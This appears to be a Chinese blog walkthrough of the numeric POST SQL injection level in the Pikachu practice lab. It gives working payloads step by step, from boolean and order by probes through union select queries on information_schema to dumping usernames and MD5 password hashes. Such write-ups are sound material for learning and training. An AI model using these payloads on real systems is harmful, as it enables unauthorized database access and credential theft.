当前位置:   article > 正文

【pikachu-SQL】数字型注入(post)2022,超详细_pikachu数字型注入

pikachu数字型注入

本人小菜鸡一枚,根据日常学习整理一些内容,希望大佬莫喷,如有错误,欢迎指正,感谢感谢!!!

数字型注入(post)

1、没有输入框,所以抓包修改

 

判断是否有注入:id=2 and 1=1页面返回正常

id=2 and 1=2 页面报错,存在注入

2、根据返回内容,可判断可能有两个注入点,通过order by语句判断是否正确

 

返回正常

 

报错,可以判断为两列

3、尝试union联合来确定注入点

id = 2 union select 99,98

 

4、开始爆数据库

id = 2 union select 99,database()

 

数据库名称:pikachu

5、根据pikachu,爆表名,union联合查询需要借助information_schema数据库,来查询当前数据库信息,information_schema是mysql自带的数据库

id=2 union select 99,table_name from information_schema.tables where table_schema = 'pikachu'

可以看到存在一个users表,猜测用户、密码放在里面

6、根据users表,爆列名

union select 99,column_name from information_schema.columns where table_name='users'

可以看出存在user、password列

7、最后一步,根据表,爆数据

union select username,password from users

密码是md5加密,通过在线解密就可以

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/267532
推荐阅读
相关标签
  

闽ICP备14008679号